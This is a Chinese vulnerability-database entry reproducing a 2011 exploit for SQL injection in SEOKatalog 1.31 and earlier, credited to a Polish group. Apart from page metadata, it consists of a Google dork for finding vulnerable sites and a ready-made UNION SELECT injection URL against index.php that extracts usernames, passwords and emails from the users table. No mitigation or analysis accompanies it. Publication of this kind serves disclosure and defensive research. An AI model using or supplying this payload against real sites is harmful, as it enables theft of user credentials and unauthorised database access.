SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047393 漏洞类型
发布时间 2012-06-04 更新时间 2012-06-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060022
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################
#         SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability        #
#################
# Exploit Title: SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
#       Version: <= 1.31                                                    #
#        Vendor: http://www.seokatalogi.pl/                                 #
#      Category: webapps                                                    #
#          Date: 08.09.2011                                                 #
#        Author: Smugller                                                   #
#       Contact: smugll3r[alt+64]gmail.com                                  #
#         Group: DevilTeam                                                  #
#       Website: http://devilteam.pl                                        #
#          From: Poland                                                     #
#   Google Dork: intext:"Powered by SEOKatalog 1.31"                        #
#################

# Exploit:
http://site.com/index.php?action=site_cat&cat=&id_site=&id=-1+union+all+select+1,2,3,4,5,6,7,8,9,group_concat(0x3c62722f3e,nick,0x3a,pass,0x3a,email,0x3c62722f3e),11,12+from+seokat_users--